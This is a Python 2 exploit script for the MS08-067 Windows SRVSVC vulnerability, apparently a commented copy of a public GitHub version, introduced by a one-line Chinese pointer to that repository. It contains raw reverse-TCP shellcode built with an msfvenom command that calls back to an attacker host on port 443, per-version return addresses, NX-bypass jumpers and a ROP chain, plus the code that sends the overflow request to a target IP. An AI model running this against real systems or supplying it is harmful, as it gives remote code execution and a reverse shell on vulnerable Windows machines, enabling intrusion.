python 在此处找到MS08-067 python脚本的修改版本:https://github.com/ankh2054/python-exploits/blob/master/ms08_067.



#!/usr/bin/env python
import struct
import time
import sys

from threading import Thread  # Thread is imported incase you would like to modify

try:
    from impacket import uuid
    from impacket.dcerpc.v5 import transport
except ImportError, _:
    # impacket (and the PyCrypto it depends on) is required for the DCERPC
    # transport below; without it there is nothing useful to do, so point
    # at the download locations and stop with a non-zero status.
    print '\n'.join((
        'Install the following library to make this script work',
        'Impacket : http://oss.coresecurity.com/projects/impacket.html',
        'PyCrypto : http://www.amk.ca/python/code/crypto.html',
    ))
    sys.exit(1)

# Startup banner: one print of a single implicitly-concatenated literal.
# The trailing '\n' on the last line plus print's own newline leaves the
# same blank line after the box as the original seven prints did.
print (
    '#######################################################################\n'
    '#  MS08-067 Exploit                                                   #\n'
    '#  This is a modified verion of Debasis Mohanty\'s code                #\n'
    '#    (https://www.exploit-db.com/exploits/7132/).                     #\n'
    '#  The return addresses and the ROP parts are ported from metasploit  #\n'
    '#    module exploit/windows/smb/ms08_067_netapi                       #\n'
    '#######################################################################\n'
)

# Shellcode - Standard Reverse TCP shellcode
# Badchars: \x00\x0a\x0d\x5c\x5f\x2f\x2e\x40
# Payload size: 348 bytes + 62 NOPs (included)
# Make sure you set meterpreter EXITFUNC=thread  - Important!
# msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.95 LPORT=443 \
# EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -n 62
# Raw payload bytes as emitted by the msfvenom command in the comment above.
# Keep this literal byte-for-byte: it is spliced into the fixed-layout
# request stub built in SRVSVC_Exploit.__DCEPacket, and the comment above
# records the badchar set and size it was generated for.  Anyone re-running
# the generator must use the same badchar list and NOP sled length (-n 62).
shellcode = (
    "\x49\x3f\xfd\xfc\xfc\x43\xfc\x90\xd6\xfc\x42\x43\x41\x3f\x43\x4a"
    "\xfd\xd6\x48\x92\x99\x42\x27\x41\xf8\xfc\x90\xf8\xf5\x91\x9f\xf9"
    "\x98\x37\x93\x41\x3f\xf5\x93\x98\xd6\x4b\x48\x3f\x27\x4a\x43\xf5"
    "\xfd\x43\xf9\x90\xf9\x98\x90\x4a\x92\x4a\x9f\xfc\x98\x92\x33\xc9"
    "\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\x9c\x91\x96"
    "\xc3\x83\xee\xfc\xe2\xf4\x60\x79\x14\xc3\x9c\x91\xf6\x4a\x79\xa0"
    "\x56\xa7\x17\xc1\xa6\x48\xce\x9d\x1d\x91\x88\x1a\xe4\xeb\x93\x26"
    "\xdc\xe5\xad\x6e\x3a\xff\xfd\xed\x94\xef\xbc\x50\x59\xce\x9d\x56"
    "\x74\x31\xce\xc6\x1d\x91\x8c\x1a\xdc\xff\x17\xdd\x87\xbb\x7f\xd9"
    "\x97\x12\xcd\x1a\xcf\xe3\x9d\x42\x1d\x8a\x84\x72\xac\x8a\x17\xa5"
    "\x1d\xc2\x4a\xa0\x69\x6f\x5d\x5e\x9b\xc2\x5b\xa9\x76\xb6\x6a\x92"
    "\xeb\x3b\xa7\xec\xb2\xb6\x78\xc9\x1d\x9b\xb8\x90\x45\xa5\x17\x9d"
    "\xdd\x48\xc4\x8d\x97\x10\x17\x95\x1d\xc2\x4c\x18\xd2\xe7\xb8\xca"
    "\xcd\xa2\xc5\xcb\xc7\x3c\x7c\xce\xc9\x99\x17\x83\x7d\x4e\xc1\xf9"
    "\xa5\xf1\x9c\x91\xfe\xb4\xef\xa3\xc9\x97\xf4\xdd\xe1\xe5\x9b\x6e"
    "\x43\x7b\x0c\x90\x96\xc3\xb5\x55\xc2\x93\xf4\xb8\x16\xa8\x9c\x6e"
    "\x43\x93\xcc\xc1\xc6\x83\xcc\xd1\xc6\xab\x76\x9e\x49\x23\x63\x44"
    "\x01\xa9\x99\xf9\x9c\xc8\x9c\xce\xfe\xc1\x9c\x90\x2d\x4a\x7a\xfb"
    "\x86\x95\xcb\xf9\x0f\x66\xe8\xf0\x69\x16\x19\x51\xe2\xcf\x63\xdf"
    "\x9e\xb6\x70\xf9\x66\x76\x3e\xc7\x69\x16\xf4\xf2\xfb\xa7\x9c\x18"
    "\x75\x94\xcb\xc6\xa7\x35\xf6\x83\xcf\x95\x7e\x6c\xf0\x04\xd8\xb5"
    "\xaa\xc2\x9d\x1c\xd2\xe7\x8c\x57\x96\x87\xc8\xc1\xc0\x95\xca\xd7"
    "\xc0\x8d\xca\xc7\xc5\x95\xf4\xe8\x5a\xfc\x1a\x6e\x43\x4a\x7c\xdf"
    "\xc0\x85\x63\xa1\xfe\xcb\x1b\x8c\xf6\x3c\x49\x2a\x76\xde\xb6\x9b"
    "\xfe\x65\x09\x2c\x0b\x3c\x49\xad\x90\xbf\x96\x11\x6d\x23\xe9\x94"
    "\x2d\x84\x8f\xe3\xf9\xa9\x9c\xc2\x69\x16"
)

# %-format templates for the per-target "jumper" that follows the payload in
# the stub.  SRVSVC_Exploit.__DCEPacket fills the %s slots with the
# target-specific addresses for os options '1'..'6'; option '7' uses
# generate_rop instead.  The padding lengths ("A" * 4, "A" * 42, ...) are
# part of the fixed layout and must not be changed independently.
nonxjmper = "\x08\x04\x02\x00%s" + "A" * 4 + "%s" + \
    "A" * 42 + "\x90" * 8 + "\xeb\x62" + "A" * 10
disableNXjumper = "\x08\x04\x02\x00%s%s%s" + "A" * \
    28 + "%s" + "\xeb\x02" + "\x90" * 2 + "\xeb\x62"
# NOTE(review): ropjumper is defined here but not referenced anywhere in this
# file; it appears to be a leftover from the original code.
ropjumper = "\x00\x08\x01\x00" + "%s" + "\x10\x01\x04\x01"
# Load address that generate_rop adds to every RVA in the option-'7' table;
# it is only meaningful for that one target build.
module_base = 0x6f880000


def generate_rop(rvas):
    """Return the ROP chain used by the 'AlwaysOn NX' target (os option '7').

    rvas -- dict keyed by the gadget-description strings used below, each
            mapping to an RVA.  Every RVA is rebased by adding the
            module-level ``module_base`` and packed as a little-endian
            DWORD ('<L').  A missing key raises KeyError.

    Returns a plain byte string: packed addresses interleaved with the short
    inline byte sequences gadget1..gadget3.  The order of the ``ret +=``
    lines *is* the chain layout and must not be rearranged.  The literal
    DWORDs (0x00018000, 0x01040110, 0x01010101) come from the metasploit
    port mentioned in the banner and are not derived here.
    """
    # Inline byte sequences placed in the chain as data between the
    # packed addresses.
    gadget1 = "\x90\x5a\x59\xc3"
    gadget2 = ["\x90\x89\xc7\x83", "\xc7\x0c\x6a\x7f", "\x59\xf2\xa5\x90"]
    gadget3 = "\xcc\x90\xeb\x5a"
    ret = struct.pack('<L', 0x00018000)
    ret += struct.pack('<L', rvas['call_HeapCreate'] + module_base)
    ret += struct.pack('<L', 0x01040110)
    ret += struct.pack('<L', 0x01010101)
    ret += struct.pack('<L', 0x01010101)
    ret += struct.pack('<L',
                       rvas['add eax, ebp / mov ecx, 0x59ffffa8 / ret'] + module_base)
    ret += struct.pack('<L', rvas['pop ecx / ret'] + module_base)
    ret += gadget1
    ret += struct.pack('<L', rvas['mov [eax], ecx / ret'] + module_base)
    ret += struct.pack('<L', rvas['jmp eax'] + module_base)
    ret += gadget2[0]
    ret += gadget2[1]
    ret += struct.pack('<L', rvas[
        'mov [eax+8], edx / mov [eax+0xc], ecx / mov [eax+0x10], ecx / ret'] + module_base)
    ret += struct.pack('<L', rvas['pop ecx / ret'] + module_base)
    ret += gadget2[2]
    ret += struct.pack('<L', rvas['mov [eax+0x10], ecx / ret'] + module_base)
    ret += struct.pack('<L', rvas['add eax, 8 / ret'] + module_base)
    ret += struct.pack('<L', rvas['jmp eax'] + module_base)
    ret += gadget3
    return ret


class SRVSVC_Exploit(Thread):
    """Worker thread that builds one SRVSVC request and sends it to ``target``.

    The connection is a DCERPC-over-named-pipe transport ('ncacn_np') to the
    browser pipe on the target, bound to the SRVSVC interface UUID used in
    ``__DCEPacket``.  Instances are single-use: ``start()`` runs ``run`` once.
    From a monitoring point of view the whole activity is one bind plus one
    call with opnum 0x1f carrying an oversized path argument (see ``run``).
    """

    def __init__(self, target, os, port=445):
        """Store connection parameters; no network activity happens here.

        target -- host name or IP interpolated into the ncacn_np string.
        os     -- one of the menu strings '1'..'7' that selects the
                  per-target return addresses in ``__DCEPacket``.
                  (The name shadows the stdlib ``os`` module name; that
                  module is not imported in this file, so it is harmless.)
        port   -- stored in ``self.__port`` but never read: the transport
                  string is built from ``target`` alone, so passing a
                  non-default port has no effect.
        """
        super(SRVSVC_Exploit, self).__init__()
        self.__trans = None
        self.__dce = None
        self.__stub = None
        self.__port = port
        self.__target = target
        self.__os = os

    def __DCEPacket(self):
        """Pick the jumper for ``self.__os``, connect/bind, and build ``self.__stub``.

        Options '1'..'6' fill one of the module-level %-templates with
        hard-coded addresses; option '7' uses generate_rop.  Any other
        value prints a message and calls sys.exit(-1).

        NOTE(review): this method runs inside the worker thread (from
        ``run``), where SystemExit is caught by the threading machinery, so
        an unsupported ``os`` value ends the thread quietly and the
        process exit status is not -1 -- confirm if callers rely on it.
        """
        if self.__os == '1':
            print 'Windows XP SP0/SP1 Universal\n'
            ret = "\x61\x13\x00\x01"
            jumper = nonxjmper % (ret, ret)
        elif self.__os == '2':
            print 'Windows 2000 Universal\n'
            ret = "\xb0\x1c\x1f\x00"
            jumper = nonxjmper % (ret, ret)
        elif self.__os == '3':
            print 'Windows 2003 SP0 Universal\n'
            ret = "\x9e\x12\x00\x01"  # 0x01 00 12 9e
            jumper = nonxjmper % (ret, ret)
        elif self.__os == '4':
            print 'Windows 2003 SP1 English\n'
            ret_dec = "\x8c\x56\x90\x7c"  # 0x7c 90 56 8c dec ESI, ret @SHELL32.DLL
            ret_pop = "\xf4\x7c\xa2\x7c"  # 0x 7c a2 7c f4 push ESI, pop EBP, ret @SHELL32.DLL
            jmp_esp = "\xd3\xfe\x86\x7c"  # 0x 7c 86 fe d3 jmp ESP @NTDLL.DLL
            disable_nx = "\x13\xe4\x83\x7c"  # 0x 7c 83 e4 13 NX disable @NTDLL.DLL
            jumper = disableNXjumper % (
                ret_dec * 6, ret_pop, disable_nx, jmp_esp * 2)
        elif self.__os == '5':
            print 'Windows XP SP3 French (NX)\n'
            ret = "\x07\xf8\x5b\x59"  # 0x59 5b f8 07
            disable_nx = "\xc2\x17\x5c\x59"  # 0x59 5c 17 c2
            # the nonxjmper also work in this case.
            jumper = nonxjmper % (disable_nx, ret)
        elif self.__os == '6':
            print 'Windows XP SP3 English (NX)\n'
            ret = "\x07\xf8\x88\x6f"  # 0x6f 88 f8 07
            disable_nx = "\xc2\x17\x89\x6f"  # 0x6f 89 17 c2
            # the nonxjmper also work in this case.
            jumper = nonxjmper % (disable_nx, ret)
        elif self.__os == '7':
            print 'Windows XP SP3 English (AlwaysOn NX)\n'
            # RVA table consumed by generate_rop; the keys must match the
            # strings it looks up exactly.  Two entries are expressed as
            # offsets from a sibling entry (+ 6).
            rvasets = {'call_HeapCreate': 0x21286,
                       'add eax, ebp / mov ecx, 0x59ffffa8 / ret': 0x2e796,
                       'pop ecx / ret': 0x2e796 + 6,
                       'mov [eax], ecx / ret': 0xd296,
                       'jmp eax': 0x19c6f,
                       'mov [eax+8], edx / mov [eax+0xc], ecx / mov [eax+0x10], ecx / ret': 0x10a56,
                       'mov [eax+0x10], ecx / ret': 0x10a56 + 6,
                       'add eax, 8 / ret': 0x29c64}
            # the nonxjmper also work in this case.
            jumper = generate_rop(rvasets) + "AB"
        else:
            print 'Not supported OS version\n'
            sys.exit(-1)

        # Connect over the named pipe and bind to the SRVSVC interface.
        # ``self.__port`` is not used here.
        print '[-]Initiating connection'
        self.__trans = transport.DCERPCTransportFactory(
            'ncacn_np:%s[\\pipe\\browser]' % self.__target)
        self.__trans.connect()
        print '[-]connected to ncacn_np:%s[\\pipe\\browser]' % self.__target
        self.__dce = self.__trans.DCERPC_class(self.__trans)
        self.__dce.bind(uuid.uuidtup_to_bin(
            ('4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0')))

        # Change shellcode to your required shellcode
        # Fixed-layout request stub: server name, path (filler + payload +
        # jumper), then the remaining fixed fields.  The surrounding
        # constants are sized for this exact path; changing the payload
        # length without re-checking them breaks the layout.
        path = "\x5c\x00" + "ABCDEFGHIJ" * 10 + shellcode + \
            "\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00" + \
            "\x41\x00\x42\x00\x43\x00\x44\x00\x45\x00\x46\x00\x47\x00" + jumper + "\x00" * 2
        server = "\xde\xa4\x98\xc5\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00" + \
            "\x41\x00\x42\x00\x43\x00\x44\x00\x45\x00\x46\x00\x47\x00\x00\x00"
        prefix = "\x02\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x5c\x00\x00\x00"
        self.__stub = server + "\x36\x01\x00\x00\x00\x00\x00\x00\x36\x01\x00\x00" + \
            path + "\xE8\x03\x00\x00" + prefix + "\x01\x10\x00\x00\x00\x00\x00\x00"
        return

    def run(self):
        """Thread body: build the stub, send it as opnum 0x1f, wait 5 s, report.

        The 5-second sleep is an unconditional delay; nothing here checks
        whether the call succeeded, so 'Exploit finish' is printed either
        way.  Exceptions raised by ``call`` propagate out of the thread.
        """
        self.__DCEPacket()
        # Single SRVSVC call (opnum 0x1f) carrying the stub built above;
        # this request is the on-the-wire artefact that detection rules for
        # this issue key on.
        self.__dce.call(0x1f, self.__stub)
        time.sleep(5)
        print 'Exploit finish\n'


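def main():
    """Parse ``<target ip> <os>`` from argv and start one SRVSVC_Exploit thread.

    Both positional arguments are required; when either is missing the
    usage text and the accepted ``os`` values are printed and the process
    exits with -1.  The thread is not joined explicitly -- it is a normal
    (non-daemon) thread, so the interpreter waits for it at shutdown.
    """
    try:
        target = sys.argv[1]
        os_choice = sys.argv[2]
    except IndexError:
        # The usage line previously listed only <target ip> although the
        # second argument is mandatory; it now matches the examples below.
        print 'Usage: %s <target ip> <os>\n' % sys.argv[0]
        print 'Example: \'%s 192.168.1.1 1\' for Windows XP SP0/SP1 Universal' % sys.argv[0]
        print 'Example: \'%s 192.168.1.1 2\' for Windows 2000 Universal' % sys.argv[0]
        print 'Example: \'%s 192.168.1.1 3\' for Windows 2003 SP0 Universal' % sys.argv[0]
        print 'Example: \'%s 192.168.1.1 4\' for Windows 2003 SP1 English' % sys.argv[0]
        print 'Example: \'%s 192.168.1.1 5\' for Windows XP SP3 French (NX)' % sys.argv[0]
        print 'Example: \'%s 192.168.1.1 6\' for Windows XP SP3 English (NX)' % sys.argv[0]
        print 'Example: \'%s 192.168.1.1 7\' for Windows XP SP3 English (AlwaysOn NX)' % sys.argv[0]
        sys.exit(-1)

    current = SRVSVC_Exploit(target, os_choice)
    current.start()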


# Script entry point; importing the module does not start anything.
if __name__ == "__main__":
    main()
